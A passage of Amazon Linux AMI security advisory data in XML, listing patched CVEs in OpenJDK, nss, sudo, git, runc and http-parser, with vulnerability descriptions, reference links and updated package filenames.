Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
99999:
1761262: CVE-2019-2983 OpenJDK: Unexpected exception thrown during Font object deserialization (Serialization, 8224915)
CVE-2019-2981:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JAXP). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
1760980: CVE-2019-2981 OpenJDK: Unexpected exception thrown by XPath processing crafted XPath expression (JAXP, 8224532)
CVE-2019-2978:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Networking). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
1761006: CVE-2019-2978 OpenJDK: Incorrect handling of nested jar: URLs in Jar URL handler (Networking, 8223892)
CVE-2019-2973:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JAXP). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
1760978: CVE-2019-2973 OpenJDK: Unexpected exception thrown by XPathParser processing crafted XPath expression (JAXP, 8223505)
CVE-2019-2964:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Concurrency). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
1760963: CVE-2019-2964 OpenJDK: Unexpected exception thrown by Pattern processing crafted regular expression (Concurrency, 8222684)
CVE-2019-2962:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
1761266: CVE-2019-2962 OpenJDK: NULL pointer dereference in DrawGlyphList (2D, 8222690)
CVE-2019-2945:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Networking). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 3.1 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L).
No description is available for this CVE.
1761596: CVE-2019-2945 OpenJDK: Missing restrictions on use of custom SocketImpl (Networking, 8218573)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2945" title="" id="CVE-2019-2945" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2962" title="" id="CVE-2019-2962" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2964" title="" id="CVE-2019-2964" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2973" title="" id="CVE-2019-2973" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2978" title="" id="CVE-2019-2978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2981" title="" id="CVE-2019-2981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2983" title="" id="CVE-2019-2983" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2987" title="" id="CVE-2019-2987" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2988" title="" id="CVE-2019-2988" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2989" title="" id="CVE-2019-2989" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2992" title="" id="CVE-2019-2992" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2999" title="" id="CVE-2019-2999" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2583" title="" id="CVE-2020-2583" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2590" title="" id="CVE-2020-2590" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2593" title="" id="CVE-2020-2593" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2601" title="" id="CVE-2020-2601" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2604" title="" id="CVE-2020-2604" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2654" title="" id="CVE-2020-2654" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2659" title="" id="CVE-2020-2659" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.251" release="2.6.21.0.82.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.251-2.6.21.0.82.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.251" release="2.6.21.0.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.251-2.6.21.0.82.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.251" release="2.6.21.0.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.251-2.6.21.0.82.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.251" release="2.6.21.0.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.251-2.6.21.0.82.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.251" release="2.6.21.0.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.251-2.6.21.0.82.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.251" release="2.6.21.0.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.251-2.6.21.0.82.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.251" release="2.6.21.0.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.251-2.6.21.0.82.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.251" 
release="2.6.21.0.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.251-2.6.21.0.82.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.251" release="2.6.21.0.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.251-2.6.21.0.82.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.251" release="2.6.21.0.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.251-2.6.21.0.82.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.251" release="2.6.21.0.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.251-2.6.21.0.82.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1355</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1355: important priority package update for nss nss-softokn nss-util nspr</title><issued date="2020-03-16 21:29:00" /><updated date="2020-03-18 22:10:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11745:
When encrypting with a block cipher, if a call to NSC_EncryptUpdate was made with data smaller than the block size, a small out of bounds write could occur. This could have caused heap corruption and a potentially exploitable crash. This vulnerability affects Thunderbird < 68.3, Firefox ESR < 68.3, and Firefox < 71.
A heap-based buffer overflow was found in the NSC_EncryptUpdate() function in Mozilla nss. A remote attacker could trigger this flaw via SRTP encrypt or decrypt operations to execute arbitrary code with the permissions of the user running the application (compiled with nss). While the attack complexity is high, the impacts to confidentiality, integrity, and availability are high as well.
1774831: CVE-2019-11745 nss: Out-of-bounds write when passing an output buffer smaller than the block size to NSC_EncryptUpdate
CVE-2019-11729:
Empty or malformed p256-ECDH public keys may trigger a segmentation fault due to values being improperly sanitized before being copied into memory and used. This vulnerability affects Firefox ESR < 60.8, Firefox < 68, and Thunderbird < 60.8.
1728437: CVE-2019-11729 nss: Empty or malformed p256-ECDH public keys may trigger a segmentation fault
CVE-2018-12404:
A cached side channel attack during handshakes using RSA encryption could allow for the decryption of encrypted content. This is a variant of the Adaptive Chosen Ciphertext attack (AKA Bleichenbacher attack) and affects all NSS versions prior to NSS 3.41.
1657913: CVE-2018-12404 nss: Cache side-channel variant of the Bleichenbacher attack
CVE-2018-0495:
Libgcrypt before 1.7.10 and 1.8.x before 1.8.3 allows a memory-cache side-channel attack on ECDSA signatures that can be mitigated through the use of blinding during the signing process in the _gcry_ecc_ecdsa_sign function in cipher/ecc-ecdsa.c, aka the Return Of the Hidden Number Problem or ROHNP. To discover an ECDSA key, the attacker needs access to either the local machine or a different virtual machine on the same physical host.
1591163: CVE-2018-0495 ROHNP: Key Extraction Side Channel in Multiple Crypto Libraries
1591163: CVE-2018-0495 openssl: ROHNP - Key Extraction Side Channel in Multiple Crypto Libraries
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0495" title="" id="CVE-2018-0495" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12404" title="" id="CVE-2018-12404" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11729" title="" id="CVE-2019-11729" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11745" title="" id="CVE-2019-11745" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nspr-devel" version="4.21.0" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-devel-4.21.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nspr-debuginfo" version="4.21.0" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-debuginfo-4.21.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nspr" version="4.21.0" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-4.21.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nspr-debuginfo" version="4.21.0" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-debuginfo-4.21.0-1.43.amzn1.i686.rpm</filename></package><package name="nspr" version="4.21.0" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-4.21.0-1.43.amzn1.i686.rpm</filename></package><package name="nspr-devel" version="4.21.0" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-devel-4.21.0-1.43.amzn1.i686.rpm</filename></package><package name="nss-util-devel" version="3.44.0" release="4.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-devel-3.44.0-4.56.amzn1.x86_64.rpm</filename></package><package name="nss-util" version="3.44.0" release="4.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-3.44.0-4.56.amzn1.x86_64.rpm</filename></package><package name="nss-util-debuginfo" version="3.44.0" release="4.56.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/nss-util-debuginfo-3.44.0-4.56.amzn1.x86_64.rpm</filename></package><package name="nss-util-devel" version="3.44.0" release="4.56.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-devel-3.44.0-4.56.amzn1.i686.rpm</filename></package><package name="nss-util" version="3.44.0" release="4.56.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-3.44.0-4.56.amzn1.i686.rpm</filename></package><package name="nss-util-debuginfo" version="3.44.0" release="4.56.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-debuginfo-3.44.0-4.56.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.44.0" release="8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-devel-3.44.0-8.44.amzn1.x86_64.rpm</filename></package><package name="nss-softokn" version="3.44.0" release="8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-3.44.0-8.44.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.44.0" release="8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-debuginfo-3.44.0-8.44.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-devel" version="3.44.0" release="8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-devel-3.44.0-8.44.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl" version="3.44.0" release="8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-3.44.0-8.44.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.44.0" release="8.44.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-devel-3.44.0-8.44.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl" version="3.44.0" release="8.44.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-3.44.0-8.44.amzn1.i686.rpm</filename></package><package name="nss-softokn-devel" version="3.44.0" release="8.44.amzn1" epoch="0" 
arch="i686"><filename>Packages/nss-softokn-devel-3.44.0-8.44.amzn1.i686.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.44.0" release="8.44.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-debuginfo-3.44.0-8.44.amzn1.i686.rpm</filename></package><package name="nss-softokn" version="3.44.0" release="8.44.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-3.44.0-8.44.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.44.0" release="7.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.44.0-7.84.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.44.0" release="7.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.44.0-7.84.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.44.0" release="7.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.44.0-7.84.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.44.0" release="7.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.44.0-7.84.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.44.0" release="7.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.44.0-7.84.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.44.0" release="7.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.44.0-7.84.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.44.0" release="7.84.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.44.0-7.84.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.44.0" release="7.84.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.44.0-7.84.amzn1.i686.rpm</filename></package><package name="nss" version="3.44.0" release="7.84.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.44.0-7.84.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.44.0" 
release="7.84.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.44.0-7.84.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.44.0" release="7.84.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.44.0-7.84.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.44.0" release="7.84.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.44.0-7.84.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1356</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1356: important priority package update for sudo</title><issued date="2020-03-16 21:29:00" /><updated date="2020-03-18 22:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-18634:
In Sudo before 1.8.26, if pwfeedback is enabled in /etc/sudoers, users can trigger a stack-based buffer overflow in the privileged sudo process. (pwfeedback is a default setting in Linux Mint and elementary OS; however, it is NOT the default for upstream and many other packages, and would exist only if enabled by an administrator.) The attacker needs to deliver a long string to the stdin of getln() in tgetpass.c.
1796944: CVE-2019-18634 sudo: Stack based buffer overflow when pwfeedback is enabled
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18634" title="" id="CVE-2019-18634" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sudo-devel" version="1.8.6p3" release="29.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-devel-1.8.6p3-29.30.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="29.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-debuginfo-1.8.6p3-29.30.amzn1.x86_64.rpm</filename></package><package name="sudo" version="1.8.6p3" release="29.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-1.8.6p3-29.30.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="29.30.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-debuginfo-1.8.6p3-29.30.amzn1.i686.rpm</filename></package><package name="sudo-devel" version="1.8.6p3" release="29.30.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-devel-1.8.6p3-29.30.amzn1.i686.rpm</filename></package><package name="sudo" version="1.8.6p3" release="29.30.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-1.8.6p3-29.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1357</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1357: important priority package update for git</title><issued date="2020-04-15 17:03:00" /><updated date="2020-04-17 00:03:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-5260:
Affected versions of Git have a vulnerability whereby Git can be tricked into sending private credentials to a host controlled by an attacker. Git uses external "credential helper" programs to store and retrieve passwords or other credentials from secure storage provided by the operating system. Specially-crafted URLs that contain an encoded newline can inject unintended values into the credential helper protocol stream, causing the credential helper to retrieve the password for one server (e.g., good.example.com) for an HTTP request being made to another server (e.g., evil.example.com), resulting in credentials for the former being sent to the latter. There are no restrictions on the relationship between the two, meaning that an attacker can craft a URL that will present stored credentials for any host to a host of their choosing. The vulnerability can be triggered by feeding a malicious URL to git clone. However, the affected URLs look rather suspicious; the likely vector would be through systems which automatically clone URLs not visible to the user, such as Git submodules, or package systems built around Git. The problem has been patched in the versions published on April 14th, 2020, going back to v2.17.x. Anyone wishing to backport the change further can do so by applying commit 9a6bbee (the full release includes extra checks for git fsck, but that commit is sufficient to protect clients against the vulnerability). The patched versions are: 2.17.4, 2.18.3, 2.19.4, 2.20.3, 2.21.2, 2.22.3, 2.23.2, 2.24.2, 2.25.3, 2.26.1.
1822020: CVE-2020-5260 git: Crafted URL containing new lines can cause credential leak
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5260" title="" id="CVE-2020-5260" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="emacs-git-el" version="2.14.6" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.14.6-1.62.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.14.6" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.14.6-1.62.amzn1.x86_64.rpm</filename></package><package name="gitweb" version="2.14.6" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.14.6-1.62.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.14.6" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.14.6-1.62.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.14.6" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.14.6-1.62.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.14.6" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.14.6-1.62.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.14.6" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.14.6-1.62.amzn1.noarch.rpm</filename></package><package name="git-p4" version="2.14.6" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.14.6-1.62.amzn1.noarch.rpm</filename></package><package name="git-all" version="2.14.6" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.14.6-1.62.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.14.6" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.14.6-1.62.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.14.6" release="1.62.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/git-svn-2.14.6-1.62.amzn1.x86_64.rpm</filename></package><package name="perl-Git-SVN" version="2.14.6" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.14.6-1.62.amzn1.noarch.rpm</filename></package><package name="git" version="2.14.6" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.14.6-1.62.amzn1.x86_64.rpm</filename></package><package name="git-cvs" version="2.14.6" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.14.6-1.62.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.14.6" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.14.6-1.62.amzn1.x86_64.rpm</filename></package><package name="git-svn" version="2.14.6" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.14.6-1.62.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.14.6" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.14.6-1.62.amzn1.i686.rpm</filename></package><package name="git" version="2.14.6" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.14.6-1.62.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.14.6" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.14.6-1.62.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1358</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1358: medium priority package update for runc</title><issued date="2020-04-20 18:58:00" /><updated date="2020-04-23 23:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-19921:
runc through 1.0.0-rc9 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. (This vulnerability does not affect Docker due to an implementation detail that happens to block the attack.)
1796107: CVE-2019-19921 runc: volume mount race condition with shared mounts leads to information leak/integrity manipulation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19921" title="" id="CVE-2019-19921" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="runc" version="1.0.0" release="0.1.20200204.gitdc9208a.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/runc-1.0.0-0.1.20200204.gitdc9208a.1.amzn1.x86_64.rpm</filename></package><package name="runc-debuginfo" version="1.0.0" release="0.1.20200204.gitdc9208a.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/runc-debuginfo-1.0.0-0.1.20200204.gitdc9208a.1.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1359</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1359: important priority package update for http-parser</title><issued date="2020-04-20 19:21:00" /><updated date="2020-04-23 23:03:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-15605:
HTTP request smuggling in Node.js 10, 12, and 13 causes malicious payload delivery when the Transfer-Encoding header is malformed.
1800364: CVE-2019-15605 nodejs: HTTP request smuggling using malformed Transfer-Encoding header
CVE-2018-7159:
